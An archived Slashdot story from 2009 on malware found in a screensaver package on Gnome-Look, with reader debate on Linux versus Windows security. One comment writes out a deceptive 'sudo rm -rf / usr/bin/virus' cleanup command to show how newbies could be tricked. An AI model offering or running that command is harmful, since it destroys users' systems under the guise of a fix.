Malware Found Hidden In Screensaver On Gnome-Look

← Back to Stories (view on slashdot.org)

Malware Found Hidden In Screensaver On Gnome-Look

Posted by timothy on Wednesday December 9, 2009 @10:39AM from the sudo-you-know-what-you're-sudoing dept.

AndGodSed writes "OMG! UBUNTU! Reports the following: 'Malware has been found hidden inside an innocuous 'waterfall' screensaver .deb file made available on popular artwork sharing site Gnome-Look.org. The .deb file installs a script with elevated privileges designed to perform a DDoS attack as well as keep itself updated via downloads. The dodgy screensaver in question has since been removed from gnome-look, and this incident was a very basic, if potentially successful, attempt.'" A similar report at Digitizor.com says that similar malware was also found in a theme called Ninja Black. For those affected, both sites also provide instruction on cleansing your system.

97 of 611 comments (clear)

Not more safe by sopssa · 2009-12-09 10:39 · Score: 3, Insightful

It's been told to all the linux zealots so many times that Linux itself isn't really more secure against malware than Windows. It's only so because it's marketshare is like 0.5%, if even that, and it makes much more sense to make malware where the (non-geeky) users are.
This just shows that if ever linux did gain marketshare with casual people enough, the malware problem will be there too. Repositories won't help with that, because people want 3rd party programs and games.
The funny thing about this is the same that as with Mac OS X users. All of the zealots yelling that Linux/Mac OSX are secure about malware, which results in normal people thinking they can run whatever downloaded "because my OS is secure!".
And before everyone jumps on the "but you can't get infected by just browsing on porn sites on linux!", why not? What was the last time you got infected by Windows vulnerability? Those attacks are usually against 3rd party programs like PDF or Flash. And guess what, those apps are on Linux too and are just as well exploitable.
The only reason malware problems are smaller on Linux than Windows is because of the almost-non-existing desktop marketshare and that those who use it on desktop are usually more tech savvy.
This just shows that if Linux had 95% marketshare on desktop, and Windows 0.5%, it would be the same thing but just turned around.
1. Re:Not more safe by nschubach · 2009-12-09 10:43 · Score: 5, Insightful
  
  The idea behind it is so that someone will put out a patch for said vulnerability without having to wait for parent company to do so...
  It's not more secure because of it's market share, it's more secure because anyone can fix it.
  
  --
  Every time I start to have faith in humanity, I ruin it by driving to work between 7 and 8 am.
2. Re:Not more safe by phantomcircuit · 2009-12-09 10:45 · Score: 3, Insightful
  
  This just shows that if ever linux did gain marketshare with casual people enough, the malware problem will be there too. Repositories won't help with that, because people want 3rd party programs and games.
  Well that's why the goal is to get as much of the third party software into the repository as possible.
3. Re:Not more safe by Anonymous Coward · 2009-12-09 10:45 · Score: 5, Insightful
  
  All it shows is that Linux is vulnerable to trojan horses. ALL operating systems are vulnerable to trojan horses. When you show me a Linux or OS X computer that's vulnerable to something like the slammer worm, get back to me.
4. Re:Not more safe by Suiggy · 2009-12-09 10:46 · Score: 2, Insightful
  
  I agree. The best software in the world can't protect itself from clueless ignorant users who don't know any better. The more clueless, ignorant users using the software, the higher the rate of occurrence of exploitation. If Linux were to become as popular as Windows, I guarantee it would have just as many problems as Windows users currently suffer from.
5. Re:Not more safe by sopssa · 2009-12-09 10:46 · Score: 4, Insightful
  
  But that still requires distros to inspect and validate the patches before they go live to repositories. The big part isn't really fixing the code, it's to test that it surely works and doesn't cause problems for users.
  And even so, if the vulnerability is in lets say flash, just anyone or distros can't fix that closed source application.
6. Re:Not more safe by _merlin · 2009-12-09 10:47 · Score: 5, Interesting
  
  It looks like it's following the same pattern as Windows malware, too: make a cool screensaver, post it to sharing sites, hope people tell their friends about it. That was a common malware vector for Windows in the early part of this decade. Next there'll be dodgy "codecs" on pr0n sites, and once people start using malware scanners for Linux, they'll make dodgy fake antivirus software to con gullible users. Netbooks may be great for attracting attention to Linux, but we have to remember that this will include the kind of attention that no-one wants.
7. Re:Not more safe by sbeckstead · 2009-12-09 10:47 · Score: 5, Insightful
  
  Wrong, anyone can not fix it. Any one MAY fix it.
  
  Only the tech savvy programmer types that care enough to fix can fix it.
  
  --
  Why bother
8. Re:Not more safe by Anonymous Coward · 2009-12-09 10:49 · Score: 5, Interesting
  
  You kind of have a point, but the fact is, you need root privileges to install a .deb, and I have quite successfully installed gtk/gtk2 themes/icons/etc without admin privileges. If I downloaded a .deb from a random site and then installed it, it would be just like running a .exe on windows, but for most things I need to do on linux, I don't actually have to take that risk, while on Windows it seems everything is a .exe. Not sure about screensavers, but it seems this was, like 90% of viruses for any platform, a hack relying on stupid users elevating the virus to root authority themselves.
  Repositories are getting a lot better too, I don't use ubuntu any more but when I left the PPA was in ascendancy, which seemed to allow a much better enforcement of security while still letting 3rd party stuff in.
9. Re:Not more safe by _merlin · 2009-12-09 10:49 · Score: 5, Insightful
  
  Malware doesn't need to exploit vulnerabilities in the software: it only needs vulnerable users. There is no way to patch that.
10. Re:Not more safe by sopssa · 2009-12-09 10:50 · Score: 2, Interesting
  
  Any (good) linux sysadmin knows that there has been many Linux worms in the history. Yes, history. You're also referencing to a 2003 Windows worm here.
  Conficker aside, such worms are pretty much in history. Most malware now a days comes via trojans, and any OS can't protect against that unless it's totally locked down (like iPhone)
11. Re:Not more safe by amasiancrasian · 2009-12-09 10:51 · Score: 5, Insightful
  
  I've been telling many the same thing, but with one exception; Mac and *nix have started out with a better permissions system and therefore users who have downloaded an app from the Internet have been trained to be doubly sure about whatever it is that requires sudo power (e.g, the Mac sudo GUI prompt). Microsoft UAC, on the other hand, has had to deal with transitioning software developers to not write in "Program Files" and other public areas and to save data to personal home folders.
  While I'll agree with you that Mac/*nix are not any more secure than Windows, the Mac/*nix users have been taught to take a sudo prompt seriously, while in the early stages and growing pains of UAC, Windows users were easily annoyed by UAC prompts and therefore took the UAC prompts less seriously, because UAC prompted were being triggered by transitioning software developers that did not save data in the user's home folder.
  In the end, the security of any system relies on the ability for the user to authenticate and verify software downloaded. But making it more difficult, such as requiring an administrator password to be entered for elevated privileges, makes users more cautious of software requiring a sudo prompt. And while that's not inherently any more secure, at least users think twice before entering their password.
12. Re:Not more safe by nschubach · 2009-12-09 10:53 · Score: 5, Insightful
  
  The Flash player isn't open source. The Compiler is, the player is not. As I said, the idea behind open source being more secure is that you could have potentially thousands of different solutions to prevent this thing in the future. The best one is chosen and patched into the main tree. If you have the source, you can do this in a few minutes (or put in your own temporary patch) with the proper skill and be back up and more secure than someone waiting for "Patch Tuesday." Even if a patch comes in that resolves that problem, it could have been the first solution to said problem and might have problems itself that will need to be fixed later.
  It's really the potential quantity of solutions to the problem.
  I could argue with you that this vulnerability might have been fixed sooner with more market share.
  
  --
  Every time I start to have faith in humanity, I ruin it by driving to work between 7 and 8 am.
13. Re:Not more safe by kai_hiwatari · 2009-12-09 10:54 · Score: 5, Insightful
  
  This particular malware is not because of a security problem with the OS. It is more of a social engineering thing - trying to trick unsuspecting users to install a malicious script by hiding it as a theme or screensaver.
14. Re:Not more safe by sopssa · 2009-12-09 10:57 · Score: 4, Informative
  
  But this is not really about vulnerabilities. This is a screensaver that user downloads from a website. Open source or not, you can't fix that unless the whole system is totally locked down like iPhone. And that doesn't really sound good.
15. Re:Not more safe by nschubach · 2009-12-09 10:59 · Score: 2, Insightful
  
  But there is a way to minimize the impact, correct? Take this vulnerability for example. It might have had an effect on just the one user, but it wasn't going to be able to infect the system folder...
  Windows is getting better with this, but a Windows user still has more potential system destructive powers than an equivalent Linux user.
  
  --
  Every time I start to have faith in humanity, I ruin it by driving to work between 7 and 8 am.
16. Re:Not more safe by sopssa · 2009-12-09 11:03 · Score: 4, Informative
  
  But so what if it only gets access to one user? Malware doesn't really need root access. Stealing user data and sending spam is just as possible from user base. In history malware tried to just fuck over the computer which would had required root access, but now its just about sending spam or stealing data.
17. Re:Not more safe by NoobixCube · 2009-12-09 11:04 · Score: 4, Insightful
  
  Mod parent up. I know he's AC, but the point he makes is still good: There is no amount of security that can protect your machine from a clueless user.
  When you install a theme the normal way, you just drag the archive file - that is to say, no executeable parts, or any way to make the parts executeable - into the theme manager, and presto, it's installed and it asks if you want to apply it. This doesn't require root privilages because it installs to the user's personal themes folder within their home folder. When they do this, there's no way to sneak in a cron job (that's a scheduled task) or any other nasty automatically executing files. Installing from a .deb is usually unneccessary, and as this story proves, exposes your install to risk if you don't pay attention to what you're installing. In my opinion, Ubuntu, being the most newbie-visible Linux distro at the moment, has a responsibility to educate users on things like this. A PDF in their home folder, or a slide show that takes like ten minutes to go through, telling new users how Linux is different to Windows would work wonders, and take up virtually no space on the install disc. There's no excuse for there not being one.
  
  --
  Admit it. You post strawman arguments as AC so you get modded Insightful for refuting them, rather than Troll
18. Re:Not more safe by at_slashdot · 2009-12-09 11:05 · Score: 5, Insightful
  
  You have a poor understanding of what "malware" is or what Linux/Mac zealots claim.
  Malware is piece of code, all OSes run code, therefore all OSes are vulnerable to malware. What Mac and Linux "zealots" claim is that it's not likely to get malware in Linux/Mac just by browsing a site, opening an e-mail, or just by keeping the computer on and connected to the network -- that hasn't changed.
  "Repositories won't help with that, because people want 3rd party programs and games."
  I am happy with 25,000+ programs available in Debian repository, I never install random package from the Internet. At least the basic packages should be available from the repos so the risk is at least reduced if not eliminated (depending on the behavior of the user)
  In my experience people who use the word "zealot" lack arguments.
  
  --
  "It is our choices, Harry, that show what we truly are, far more than our abilities." -- Prof. Dumbledore
19. Re:Not more safe by sopssa · 2009-12-09 11:06 · Score: 2, Insightful
  
  The software ecosystem is "much more confusing" because it's an OS with 95% marketshare and theres millions of 3rd party programs and games for users. And they really want and need those.
  Actually it would really suck if Windows had just one Microsoft verified "app store" where everything is controlled like with iPhone.
20. Re:Not more safe by nurb432 · 2009-12-09 11:07 · Score: 5, Interesting
  
  Except one would hope that you could trust what you get from a site like this. Not everyone can scour the source/binary of every app they get from a 'trusted' site.
  And if you cant trust the 'trusted' sites for the free stuff, then the entire FreeOS movement is dead in its tracks.
  
  --
  ---- Booth was a patriot ----
21. Re:Not more safe by nschubach · 2009-12-09 11:07 · Score: 3, Insightful
  
  You are arguing about ignorance of users, not the security of the OS...
  
  --
  Every time I start to have faith in humanity, I ruin it by driving to work between 7 and 8 am.
22. Re:Not more safe by DragonWriter · 2009-12-09 11:08 · Score: 2, Interesting
  
  Most malware now a days comes via trojans, and any OS can't protect against that unless it's totally locked down (like iPhone)
  There's a middle ground that can maximize protection against trojans (of course, nothing can protect against completely unwary users), and that's using something a model where untrusted apps are (whether by running through app-specific accounts or otherwise) required to be given fairly finely grained permissions on installation before accessing resources.
  While Linux distros provided somewhat more protection against users being unknowingly tricked into performing dangerous tasks by providing elegant, non-intrusive ways to provide the control users need without always running as a superuser before Windows did much in that regard, it shares with Windows a fairly all or nothing security model in many regards that is particularly susceptible to trojans.
23. Re:Not more safe by Goaway · 2009-12-09 11:08 · Score: 2, Interesting
  
  And thus you raise the threshold for entry for new third-party software.
24. Re:Not more safe by nschubach · 2009-12-09 11:11 · Score: 2, Funny
  
  ... which has nothing to do with how secure the operating system is, but the profile itself.
  
  --
  Every time I start to have faith in humanity, I ruin it by driving to work between 7 and 8 am.
25. Re:Not more safe by soundguy · 2009-12-09 11:26 · Score: 3, Informative
  
  Wrong. They may have multiple user ACCOUNTS but most of them are only going to have one actual meat sack (i.e. USER) at the keyboard.
  
  --
  Nothing worthwhile ever happens before noon
26. Re:Not more safe by vadim_t · 2009-12-09 11:27 · Score: 4, Insightful
  
  Sorry, this line of argument is stupid.
  You're basically arguing that you can't be more secure than Windows -- Windows' security is as good as things will ever get, and everything else only gets less viruses because it has less marketshare.
  But if so, why all the security advancements in the latests Windows versions? Why isn't it still using Win95 era security? Why did MS bother coding support for NX, UAC and so on? Well, because turns out, it's possible to do better. Current Windows versions are vastly more locked down than Win95, because some design choices turned out to be stupid and vulnerable.
  Linux doesn't follow some common Windows security pitfalls, like having ActiveX and having the browser execute binaries from the net. It also doesn't have autorun. Just that closes several ways of compromising the system, therefore at least in that respect it's more secure. Of course it's not 100% impenetrable, but evidently there exist features and implementation details which make it easier or harder to compromise the system, so not all OSes are equally [in]secure, it depends on how they're implemented.
27. Re:Not more safe by Anonymous Coward · 2009-12-09 11:29 · Score: 4, Insightful
  
  This particular malware is not because of a security problem with the OS.
  
  Except that if this was a Windows screensaver you can bet it would be blamed on the OS and not on the fact that it was a social engineering attack.
28. Re:Not more safe by Anonymous Coward · 2009-12-09 11:29 · Score: 2, Insightful
  
  1. Something like a screensaver does not need root privileges to install, it can be unpacked to the user directory with just user rights.
  2. Even if installed centrally, the applications inside are still run with user privileges.
  3. If some application in the package requires setuid rights, it will be detected by the package manager.
29. Re:Not more safe by digitalunity · 2009-12-09 11:33 · Score: 4, Interesting
  
  Here's an idea. Feel free to agree, disagree, tear it apart, whatever...
  Why not have a kernel network access logging module with a userland process that periodically reports to users which programs are accessing the TCP/IP network? Say once a week or once a month or something. The number of programs that do this for many users is quite low. Probably Firefox, Thunderbird, Opera, uTorrent, a short list of other programs. Users then have an opportunity to ignore those programs on future reports. Users now have a good idea if there are changes to their system that might affect security.
  There would still be opportunity for malware to access the internet, but users would either 1) notice it or 2) it would make the malware work in very complicated, noticeable ways(like uploading data to a website using a URL).
  
  --
  You can't legislate goodness. Let each to his own destiny, by will of his freely made choices.
30. Re:Not more safe by mR.bRiGhTsId3 · 2009-12-09 11:38 · Score: 3, Interesting
  
  I'm sorry, you have no idea what you are talking about. Sudo is not an implicit privilege gain. You have to manually request elevation. The reason it looks implicit is because all of the applications that ever need elevated privileges come with launchers that do the work for you. Sudo can also be configured to function the same as su (OpenSUSE) ships it that way I believe. The same is true of the new policykit. Similarly, Vista is not an implicit elevation either. The continue prompt only occurs for administrator accounts because they are flagged with a token on login that mark them as administrators. They are required to manually take action. Furthermore, this function can be disable in group policy in order to force a password entry in the same way that non-admin users have to authenticate to perform system changes. The only reason it occurs automatically is through application manifests and heuristics. Both of these cases are explicit elevations at the behest of the application author that the user can approve or cancel.
31. Re:Not more safe by isorox · 2009-12-09 11:38 · Score: 3, Interesting
  
  Actually it would really suck if Windows had just one Microsoft verified "app store" where everything is controlled like with iPhone.
  Yes it would, and in this would I would add the google repository, and perhaps the apple repository. Anyone could set up a repository (same as you can with debian), and sign their packages, but if they got compromised, or let crap in, then I'd be wary of using them in the future.
  The problem with the iphone appstore is there's only one. You cant add a competitors.
32. Re:Not more safe by Anonymous Coward · 2009-12-09 11:41 · Score: 4, Insightful
  
  The reason most Windows-based PCs are infected is also due to the ignorance of users. I haven't had a virus or malware attack in years because I keep my antivirus program up to date, I don't visit sites that are prone to malware, and I use safe searching habits. The people who are constantly asking me to fix their computers are the ones who don't follow these strategies.
33. Re:Not more safe by Voulnet · 2009-12-09 11:43 · Score: 4, Insightful
  
  If you have the source, you can do this in a few minutes (or put in your own temporary patch) with the proper skill and be back up and more secure than someone waiting for "Patch Tuesday."
  If you want Linux to grow and reach more people, as opposed to being a geek niche, then you should forget about requiring people to have the skills necessary to patch the source. Emergence of malware means only one thing: Linux is growing in popularity. Now, if we wish for its popularity to prosper then we should use the normal user's perspective a little bit; you know, people who can't patch the source and compile it by themselves.
34. Re:Not more safe by LinuxIsGarbage · 2009-12-09 11:47 · Score: 2, Funny
  
  I always tell users to only download software from sites like Softpedia or Download.com. Plus you get the "choice" of what site you want. And we all know that choice is a good thing!
35. Re:Not more safe by nschubach · 2009-12-09 12:03 · Score: 4, Insightful
  
  I have a Windows machine which has been running just fine for years, but that doesn't mean that it's just as secure. If I do get a virus on that machine, there's a greater chance I will be rebuilding it opposed to my Linux machine.
  
  --
  Every time I start to have faith in humanity, I ruin it by driving to work between 7 and 8 am.
36. Re:Not more safe by Anonymous Coward · 2009-12-09 12:03 · Score: 2, Insightful
  
  the "secret" vulnerabilities will be fixed on OSS, while they still exist in secret source software.
  Huh? In either case, they only get fixed if someone finds them and reports them as bugs. Users are not expected to be OS and Kernel developers/experts. But even then, You have to deal with users who don't patch their systems.
  Conficker worm:
  Vulnerability patched: - October 23, 2008 ( http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx )
  Worm seen in wild: - November 2008 and still spreading to this day
  I wonder if the press gave MS a pass on this, since it they had already patched it prior to the first report of the worm was logged. If the tables were reversed I'll bet 100% of Slashdot and the other online Linux cheerleaders would claim it wasn't the fault of any distro. You'd see snide posts like
  "Unpatched computers get infected. News at 11" , "Idiots who don't patch their system get infected" , etc. No, its not a strawman, its an informed opinion ;)
37. Re:Not more safe by bcmm · 2009-12-09 12:11 · Score: 2, Insightful
  
  In history malware tried to just fuck over the computer which would had required root access
  (If I didn't have backups) I would rather you ran rm -r /etc/ than rm -r ~/ on my box.
  
  --
  # cat /dev/mem | strings | grep -i llama
  Damn, my RAM is full of llamas.
38. Re:Not more safe by phantomfive · 2009-12-09 12:14 · Score: 4, Informative
  
  Not by anyone intelligent. The difference between Windows and Linux is how easy it is to remove stuff like this on Linux. It's easy on Linux. Sometimes practically impossible on windows.
  
  --
  Qxe4
39. Re:Not more safe by kenshin33 · 2009-12-09 12:16 · Score: 2, Funny
  
  well, I'm not questioning sudo per say (it's useful) and yes you can manage it's use. What I call implicit (less explicit would more curate)is the way Ubuntu (may be other distros I don;t know, I'm a gentoo user)) uses it, yes you have to enter a password, But opening a terminal and typing "su" (or sudo for that matter) is more explicite. Meaning you won't do it just for pleasure, and therefore most likely you know what you're about to do. Any app that wants root priviledges can popup a window (gksu, gksudo). While it's convenient, it's more dangerous. most people don;t actually read carefully before clicking.
40. Re:Not more safe by thejynxed · 2009-12-09 12:17 · Score: 3, Informative
  
  In this day and age, if your machine gets compromised by a virus, trojan, or rootkit, the only sensible thing to do is wipe and reinstall from a known clean backup. It doesn't matter what OS it is. There's no telling what other little friends they brought along that your chosen methods of detection didn't find. It's not really an option anymore to keep on going with a system that was compromised.
  There's also been some evidence of malware that triggers AV software on purpose, and acts as a distraction while the real dirty payload gets delivered silently elsewhere in your system. You are now fooled into thinking your system is clean because your AV caught the distraction virus, completely missing the real one that was also installed.
  
  --
  @Mindless Drivel: 100% of Twitter posts ever Tweeted.
41. Re:Not more safe by Dog-Cow · 2009-12-09 12:19 · Score: 2, Informative
  
  WIndows NT 3.5 existed at the same time as Windows 3.1 and had most of the same security features as Windows 7. The NX bit had not been implemented by Intel, so it couldn't support that, and the UAC stuff is not really needed for security. It's just a shortcut for getting admin privs without logging in as admin.
  Really the recent changes in Windows security has been in guiding the user to more secure practices, such as not logging in as admin.
42. Re:Not more safe by mysidia · 2009-12-09 12:20 · Score: 2, Interesting
  
  Both. You are imagining a false dichotomy where there is none.
  Getting as much of the 3rd party software as possible into the repository does not preclude raising the threshold of entry.
  Some software you want to fall below the threshold is no-name drive-by malware.
43. Re:Not more safe by Jon.Laslow · 2009-12-09 12:28 · Score: 3, Insightful
  
  "...or a slide show that takes like ten minutes to go through..."
  
  Did you just seriously suggest that Ubuntu include a ten minute presentation for users to watch? As in, no sarcasm there? Do you honestly expect anyone to actually sit through that? Most people don't have the attention span to sit through the multilingual Welcome video OS X shows on first-boot without trying to skip it, let alone something that talks about security for ten minutes. Remember, if you can't make the user care enough to look in the address bar to see if the 'PayPal' link sent to them in an email is actually legit, you aren't going to make them care enough to sit through ten minutes of tedium after their install is done.
44. Re:Not more safe by Anonymous Coward · 2009-12-09 12:38 · Score: 2, Interesting
  
  So what? On my system any script or program can not be executed without my knowledge. Programs can not access outside of specific directories. They are totally ironed and sealed from each other.
  Example, I can not even open a picture from any other directory than ~/Pictures directory. And only application to do that is the Gwenview.
  Only place to run any script (or binary executable) is from ~/bin but it first need to be profiled to do so. So I can copy what ever binaries to that directory and they can not be executed if I do not give permission first from admin profile.
45. Re:Not more safe by mr+exploiter · 2009-12-09 12:38 · Score: 2, Interesting
  
  The argument is still the same. I'd rather be able to tell someone who can that they may than tell them they may not.
  Anyone can try to fix it. Some may be better than others, but that's doesn't preclude someone from trying. Whereas, on competing systems you may not.
  This argument is starting to look stupid specially in a story like this.
  Any software that I use has to be made by someone I trust, there is no escape from that, no "but the source is available". I have to trust the maker.
  And giving excuses instead of assuming responsibility is not going to gain my trust. There have to be concrete steps to assure this not happens again. No excuses.
46. Re:Not more safe by Rockoon · 2009-12-09 12:44 · Score: 2, Funny
  
  No I am not. You have assumed there is a false dichotomy because you imagine repository resources to be infinite.
  
  The argument is that people want 3rd party software, ergo if the repository does not have it then people will go somewhere else for it.
  
  The response to this point is that repositories strive to have as much 3rd party software as possible on them. This would be fine and dandy if there is no raised entry bar, because there could theoretically be enough resources to host every 3rd party program that exists (for instance, Google could.)
  
  But you have imagined a world where there is also enough human resources in order to maintain that raised entry bar (humans looking over source code, accepting and rejecting programs based on what they are programmed to do) while also overcoming the need to download 3rd party programs from someplace else
  
  If Linux had 95% market share, no software repository on the planet could keep up with the *submissions* to it while also maintaining that raised bar of yours, because they simply cannot allocate enough humans to the task.
  
  --
  "His name was James Damore."
47. Re:Not more safe by LordLimecat · 2009-12-09 12:49 · Score: 5, Insightful
  
  If gnome-look is hosting .debs and not reviewing them, it seems to me like theyre inviting disaster.
48. Re:Not more safe by Goaway · 2009-12-09 12:51 · Score: 3, Insightful
  
  We are not. The whole point is that there is one actual human user, and thus there is zero difference if the malware can spread to other users or not, since it has already infected 100% of the available users.
49. Re:Not more safe by oatworm · 2009-12-09 13:04 · Score: 2, Insightful
  
  Except if the screensaver happens to have some other program attached to the installation package, it'll be installed with root privileges without you knowing about it. Once that happens, you're done - it can rename system files, replace existing system files with its own 'dirty' files, or do anything else that root can do (i.e. practically anything), including preventing you from ever uninstalling it. They don't call it a "rootkit" because it first came out on Windows.
50. Re:Not more safe by Thinboy00 · 2009-12-09 13:11 · Score: 5, Interesting
  
  My mother managed to get some nearly-impossible-to-remove scareware on her (Windows) netbook. She swears up and down that she never visited any sketchy sites, had AV (but no anti-malware), etc. She was basically using it for several things:
  1) Visiting various newspapers' websites
  2) Webmail (a dedicated server for her business)
  3) Word processing (OpenOffice.org)
  4) Spider Solitaire
  5) A few online games (jigsaw puzzles, sudoku, presumably flash-based) she found on Google. I think this is the most likely vector, but she uses the same websites all the time.
  6) Visiting certain reputable, ad-free (AFAIK) sites.
  She is smart enough to never download/run/open suspicious programs/files/etc and she was using Firefox 3.5. This thing was able to prevent itself from being uninstalled easily. On Linux, she could have simply killed any offending processes (O.K. that's nontrivial, but no root permissions needed in theory) and check the (graphical, so-easy-to-use-a-caveman^H^Hgrandma-could-do-it) Gnome startup programs tool for suspicious entries. On Windows, we eventually had to use "System restore" (an OS feature) -- which the program could potentially have disabled had the malware author thought to do so (it was totally rooted -- the malware was preventing the installation of some anti-malware programs) and then download the anti-malware program that had previously failed to install. Windows Vista/7 are probably more secure than XP which she has, but I'm still reluctant to blame all Windows security issues on user stupidity. Now I have her running Firefox+NoScript so that it (hopefully) won't happen again, but that's mostly because she refuses to switch to Linux. Most users would be running IE7 or so... not Firefox+NoScript. This is clearly not just "user stupidity" -- it's a windows genuine advantage^H^Hbug.
  
  --
  $ make available
51. Re:Not more safe by Thinboy00 · 2009-12-09 13:14 · Score: 5, Insightful
  
  There's also been some evidence of malware that triggers AV software on purpose, and acts as a distraction while the real dirty payload gets delivered silently elsewhere in your system. You are now fooled into thinking your system is clean because your AV caught the distraction virus, completely missing the real one that was also installed.
  AVs don't get "distracted" -- either the real payload is detectable by the AV, in which case the distraction won't be successful since both will be found and removed, or else the real payload is undetectable, in which case you don't need the distraction at all, and as a matter of fact it hurts you by making user more security-conscious.
  
  --
  $ make available
52. Re:Not more safe by Waffle+Iron · 2009-12-09 14:17 · Score: 3, Funny
  
  I was going to comment on your post, but I've set my system to allow the browser to send only 100 cha
53. Re:Not more safe by Fractal+Dice · 2009-12-09 15:05 · Score: 3, Insightful
  
  That's not the lesson I see. To me it says that a user-based security model are insufficient - apps are too free to call/use each other - the threat has moved from "rooting a box" but rather to "rooting a user". OSes (and users) need to start looking at the user as a system administrator of many threads of personal data.
  Web browsers have already discovered much of this - different tabs on your web browser are like different apps and just as a sysadmin cannot trust all the users to play nice with each others' data, users can't trust different apps with full access to all other apps.
54. Re:Not more safe by Intron · 2009-12-09 15:28 · Score: 5, Insightful
  
  The idea behind it is so that someone will put out a patch for said vulnerability without having to wait for parent company to do so....
  It turns out that I have patched a serious vulnerability in Linux. Please download and install my patch as root on your system.
  Sincerely,
  Someone
  
  --
  Intron: the portion of DNA which expresses nothing useful.
55. Re:Not more safe by phantomfive · 2009-12-09 15:52 · Score: 4, Insightful
  
  If you want Linux to grow and reach more people, as opposed to being a geek niche,
  I don't.
  
  For me, Linux is the perfect operating system for a programmer. I'd like it to stay that way. If it becomes popular, that's fine; but if it becomes something other than a programmer's operating system, I will switch to BSD or something.
  
  --
  Qxe4
56. Re:Not more safe by mjwx · 2009-12-09 17:25 · Score: 4, Interesting
  
  Open source or not, you can't fix that unless the whole system is totally locked down like iPhone
  No, even the iphone has vulnerabilities. Locking down a system does not fix vulnerabilities, it only hides them from public view. An open system is more secure as everyone know when a vulnerability is discovered and syadmin's can make work arounds (or even pull the system down) until a patch is developed. With a closed system there is less chance of an exploited vulnerability being discovered by the people who want to fix it or are affected by it.
  
  --
  Calling someone a "hater" only means you can not rationally rebut their argument.
57. Re:Not more safe by StuartHankins · 2009-12-09 17:28 · Score: 5, Insightful
  
  Personally I don't care if Linux is ever employed by the "average person". I'm not one of those people and the work I do requires people who know what's going on. Linux gives me the fine control to get in there and tweak things that Windows will probably never have.
  
  You can make a machine smarter, but people keep getting dumber all the time. At some point you just have to say to those people forget it, you're not going to learn, you're not worth trying to explain it to. Here's your Etch-a-Sketch.
58. Re:Not more safe by timeOday · 2009-12-09 17:43 · Score: 3, Interesting
  
  The registry alone makes Windows impossible to clean. Who knows what is in there? It's a bunch of gibberish. Please nobody claim it's the same as /etc, because it isn't. At best the registry is /etc's evil twin.
59. Re:Not more safe by bendodge · 2009-12-09 18:07 · Score: 2, Informative
  
  Disclaimer: I'm a tech at a work a computer repair shop.
  Let me guess: she was running as root. This scareware deleted mbam.exe as soon as the installer unpacked it, and/or had a little icon by the clock that popped a notification balloon every time you started a process saying that it (even taskman) was infected with $SCARY_VIRUS_NAME and killed the process.
  Since the middle of October, we've had a wave of clients with this stuff, many whom are running the best AV's (we sell NOD32) and have no idea how they got infected.
  Different techs have different favorite ways of removing it, but my personal technique is to create another (limited) use account and start the MBAM installer from there with elevated permissions (using Run As). TADA!
  I don't know why the scareware runs with your account permissions, but it sure makes it easy to defeat.
  
  --
  The government can't save you.
60. Re:Not more safe by vadim_t · 2009-12-09 18:21 · Score: 2, Insightful
  
  Eh? It took far too long for NX to be admitted into kernel, as if software has no bugs NX does not help.
  Similar functionality was available in grsecurity long before. Most distros don't ship the vanilla kernel anyway.
  
  Linux does have autorun, it just asks "are you sure". We all know how this is going to end up.
  No, it doesn't. Ubuntu will ask things like "Would you like to see the files on this CD, or download photos from it?", but that's not autorun. What I was referring to is running binaries from newly inserted media. AFAIK no Linux distro does that, even after asking.
  
  1. Linux market share matters, a lot. But then again I have had over ten virus and antivirus free years and most likely will still have some.
  IMO, antiviruses are a flawed security model and shouldn't be needed in a well secured system. Antiviruses only work against known threats, which means somebody must have got hit by them previously, and the antivirus vendor must have noticed.
  It's much better when the system makes a virus' execution unlikely enough that it doesn't manage to spread.
  
  2. Not all OS's are same. Capabilities, chroot, jail, zones, virtual machines, sandboxes and managed languages, NX, etc. should be used much more. IE8 is interesting, as are e.g. Chrome and Lobo browsers. This all was started by OpenSsh "privilege separation".
  5. You can protect your machine against stupid users (see second point). Quite well, actually, it is just matter of priorities. But in no OS is security #1.
  That doesn't add up. If there is such a thing as an OS that's better protected, some of them are better and some are worse protected, therefore one of those is #1, or at the very least there are security tiers, where some are definitely worse than others.
  
  3. Linux is not ahead of virus writers. No OS is.
  6. Getting root is not necessary. Reinstalling Linux takes half an hour, reinstalling all my documents takes eternity (how do I know my backups are not infected).
  7. As long as there is money to be made, viruses will be made. Or power (intelligency agencies).
  You seem to be intent on assuming I'm arguing there's such a thing as 100% effective security. But I'm not. I'm arguing that there's such a thing as better security. Linux can be more secure than Windows, while still being vulnerable to some things.
  Also, IMO, that a virus can be technically written for Linux isn't very relevant. The important thing isn't whether it can be done, it's whether it will spread. If it won't spread it'll never be a credible threat, and will remain an academic exercise.
61. Re:Not more safe by Zardus · 2009-12-09 22:47 · Score: 2, Interesting
  
  /etc might not be the same as the Windows registry (I agree with this statement, /etc is much more manageable), but the gconf registry is looking more and more like it every month. You can say gnome isn't an integral part of Linux, but it's installed on the majority of end-users systems nowadays so for these purposes, it pretty much is...
  
  --
  You can mod your friends, you can mod your nose, but you can't mod your friend's nose.
62. Re:Not more safe by ZarathustraDK · 2009-12-10 04:00 · Score: 2, Funny
  
  Yes, we need a new kind of package that only gives root-priveleges to packages that do Good Stuff(TM) ^^
  
  --
  If you quote this signature there'll be 72 copies of Windows ME waiting for you in Heaven.
YES! Finally! by binarylarry · 2009-12-09 10:46 · Score: 5, Funny

It's the YEAR OF THE LINUX desktop! It's official! /Happy Ubuntu User

--
Mod me down, my New Earth Global Warmingist friends!
Removal instructions from the site by Xerp · 2009-12-09 10:49 · Score: 2, Insightful

"sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552" Man. I'm going to have to get me some anti-malware software...
1. Re:Removal instructions from the site by wizardforce · 2009-12-09 11:02 · Score: 4, Insightful
  
  This makes me wonder how long it will be before some warning about a fake virus/trojan/worm succeeds in convincing a few Linux newbies to run some command to get rid of the fake malware which inevitably causes damage or actually downloads actual malware. Something along the lines of: "if you've been infected with virus.deb just run the following command: sudo rm -rf / usr/bin/virus" The only cure is education.
  
  --
  Sigs are too short to say anything truly profound so read the above post instead.
2. Re:Removal instructions from the site by selven · 2009-12-09 11:26 · Score: 4, Insightful
  
  A confusing command line instruction which most people would Ctrl-C and Ctrl-Shift-V into their terminal is actually a pretty good way to get a virus onto a Linux newbie's computer.
3. Re:Removal instructions from the site by visualight · 2009-12-09 13:24 · Score: 4, Insightful
  
  Oh, dude. When I'm forced to use a Windows machine my #2 pet peeve is the paste buffer. You don't realize how much middle clicking you do until you don't have it anymore.
  
  --
